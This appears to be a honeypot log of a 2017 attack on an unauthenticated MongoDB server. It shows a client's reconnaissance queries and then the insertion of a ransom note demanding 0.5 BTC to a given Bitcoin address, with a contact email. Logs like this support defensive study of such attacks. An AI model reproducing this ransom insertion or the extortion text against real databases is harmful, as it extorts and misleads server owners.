MongoDB Attacker: Harak1r1

1. [2017-01-17T22:02:10.990Z] ::ffff:82.73.230.211:59848 connected.
2. [2017-01-17T22:02:11.085Z] ::ffff:82.73.230.211:59848 -> Server:
3. [2017-01-17T22:02:11.085Z] admin.$cmd
4. [2017-01-17T22:02:11.085Z] Query: [{"isMaster":1,"client":{"application":{"name":"MongoDB Shell"},"driver":{"name":"MongoDB Internal Client","version":"3.4.0"},"os":{"type":"Windows","name":"Microsoft Windows 8","architecture":"x86_64","version":"6.2 (build 9200)"}}}]
5. Return Fields: [{"isMaster":1,"client":{"application":{"name":"MongoDB Shell"},"driver":{"name":"MongoDB Internal Client","version":"3.4.0"},"os":{"type":"Windows","name":"Microsoft Windows 8","architecture":"x86_64","version":"6.2 (build 9200)"}}}]
6.  
7. [2017-01-17T22:02:11.086Z] Server -> ::ffff:82.73.230.211:59848:
8. [2017-01-17T22:02:11.086Z] Flags: 8
9. Documents: [{"ismaster":true,"maxBsonObjectSize":16777216,"maxMessageSizeBytes":48000000,"maxWriteBatchSize":1000,"localTime":"2017-01-17T22:02:11.086Z","maxWireVersion":2,"minWireVersion":0,"ok":1}] }
10.  
11. [2017-01-17T22:02:11.395Z] ::ffff:82.73.230.211:59848 -> Server: n[2017-01-17T22:02:11.396Z] admin.$cmd
12. [2017-01-17T22:02:11.396Z] Query: [{"whatsmyuri":1}]
13. Return Fields: [{"whatsmyuri":1}]
14.  
15. [2017-01-17T22:02:11.396Z] Server -> ::ffff:82.73.230.211:59848:
16. [2017-01-17T22:02:11.396Z] Flags: 8
17. Documents: [{"you":"127.0.0.1:47608","ok":1}]
18.  
19. [2017-01-17T22:02:11.713Z] ::ffff:82.73.230.211:59848 -> Server:
20. [2017-01-17T22:02:11.714Z] admin.$cmd
21. [2017-01-17T22:02:11.714Z] Query: [{"buildinfo":1}]
22. Return Fields: [{"buildinfo":1}]
23.  
24. [2017-01-17T22:02:11.714Z] Server -> ::ffff:82.73.230.211:59848:
25. [2017-01-17T22:02:11.715Z] Flags: 8
26. Documents: [{"version":"2.6.12","gitVersion":"d73c92b1c85703828b55c2916a5dd4ad46535f6a","OpenSSLVersion":"","sysInfo":"Linux build5.ny.cbi.10gen.cc 2.6.32-431.3.1.el6.x86_64 #1 SMP Fri Jan 3 21:39:27 UTC 2014 x86_64 BOOST_LIB_VERSION=1_49","loaderFlags":"-fPIC -pthread -Wl,-z,now -rdynamic","compilerFlags":"-Wnon-virtual-dtor -Woverloaded-virtual -fPIC -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -pipe -Werror -O3 -Wno-unused-function -Wno-deprecated-declarations -fno-builtin-memcmp","allocator":"tcmalloc","versionArray":[2,6,12,0],"javascriptEngine":"V8","bits":64,"debug":false,"maxBsonObjectSize":16777216,"ok":1}]
27.  
28. [2017-01-17T22:02:12.143Z] ::ffff:82.73.230.211:59848 -> Server:
29. [2017-01-17T22:02:12.143Z] test.$cmd
30. [2017-01-17T22:02:12.143Z] Query: [{"buildInfo":1}]
31. Return Fields: [{"buildInfo":1}]
32.  
33. [2017-01-17T22:02:12.144Z] Server -> ::ffff:82.73.230.211:59848:
34. [2017-01-17T22:02:12.144Z] Flags: 8
35. Documents: [{"version":"2.6.12","gitVersion":"d73c92b1c85703828b55c2916a5dd4ad46535f6a","OpenSSLVersion":"","sysInfo":"Linux build5.ny.cbi.10gen.cc 2.6.32-431.3.1.el6.x86_64 #1 SMP Fri Jan 3 21:39:27 UTC 2014 x86_64 BOOST_LIB_VERSION=1_49","loaderFlags":"-fPIC -pthread -Wl,-z,now -rdynamic","compilerFlags":"-Wnon-virtual-dtor -Woverloaded-virtual -fPIC -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -pipe -Werror -O3 -Wno-unused-function -Wno-deprecated-declarations -fno-builtin-memcmp","allocator":"tcmalloc","versionArray":[2,6,12,0],"javascriptEngine":"V8","bits":64,"debug":false,"maxBsonObjectSize":16777216,"ok":1}]
36.  
37. [2017-01-17T22:02:12.631Z] ::ffff:82.73.230.211:59848 -> Server:
38. [2017-01-17T22:02:12.631Z] test.$cmd
39. [2017-01-17T22:02:12.631Z] Query: [{"isMaster":1,"forShell":1}]
40. Return Fields: [{"isMaster":1,"forShell":1}]
41.  
42. [2017-01-17T22:02:12.632Z] Server -> ::ffff:82.73.230.211:59848:
43. [2017-01-17T22:02:12.632Z] Flags: 8
44. Documents: [{"ismaster":true,"maxBsonObjectSize":16777216,"maxMessageSizeBytes":48000000,"maxWriteBatchSize":1000,"localTime":"2017-01-17T22:02:12.632Z","maxWireVersion":2,"minWireVersion":0,"ok":1}]
45.  
46. [2017-01-17T22:02:12.912Z] ::ffff:82.73.230.211:59848 -> Server:
47. [2017-01-17T22:02:12.913Z] admin.$cmd
48. [2017-01-17T22:02:12.913Z] Query: [{"replSetGetStatus":1,"forShell":1}]
49. Return Fields: [{"replSetGetStatus":1,"forShell":1}]
50.  
51. [2017-01-17T22:02:12.914Z] Server -> ::ffff:82.73.230.211:59848:
52. [2017-01-17T22:02:12.914Z] Flags: 8
53. Documents: [{"ok":0,"errmsg":"not running with --replSet"}]
54.  
55. [2017-01-17T22:02:13.387Z] ::ffff:82.73.230.211:59848 -> Server:
56. [2017-01-17T22:02:13.388Z] README_MISSING_DATABASES.$cmd
57. [2017-01-17T22:02:13.388Z] Query: [{"isMaster":1,"forShell":1}]
58. Return Fields: [{"isMaster":1,"forShell":1}]
59.  
60. [2017-01-17T22:02:13.388Z] Server -> ::ffff:82.73.230.211:59848:
61. [2017-01-17T22:02:13.388Z] Flags: 8
62. Documents: [{"ismaster":true,"maxBsonObjectSize":16777216,"maxMessageSizeBytes":48000000,"maxWriteBatchSize":1000,"localTime":"2017-01-17T22:02:13.388Z","maxWireVersion":2,"minWireVersion":0,"ok":1}]
63.  
64. [2017-01-17T22:02:13.687Z] ::ffff:82.73.230.211:59848 -> Server:
65. [2017-01-17T22:02:13.687Z] README_MISSING_DATABASES.$cmd
66. [2017-01-17T22:02:13.688Z] Query: [{"insert":"README_MISSING_DATABASES","documents":[{"mail":"h4r4k1r@sigaint.org","note":"SEND 0.5 BTC (BITCOIN) TO THIS ADDRESS 14QYh7PXnvXGa9ZjFFedA5savFoMySCvQW AND CONTACT THIS EMAIL WITH IP OF YOUR SERVER TO RECOVER YOUR DATABASE!.","_id":"587e9475d435c8137b907903"}],"ordered":true}]
67. Return Fields: [{"insert":"README_MISSING_DATABASES","documents":[{"mail":"h4r4k1r@sigaint.org","note":"SEND 0.5 BTC (BITCOIN) TO THIS ADDRESS 14QYh7PXnvXGa9ZjFFedA5savFoMySCvQW AND CONTACT THIS EMAIL WITH IP OF YOUR SERVER TO RECOVER YOUR DATABASE!.","_id":"587e9475d435c8137b907903"}],"ordered":true}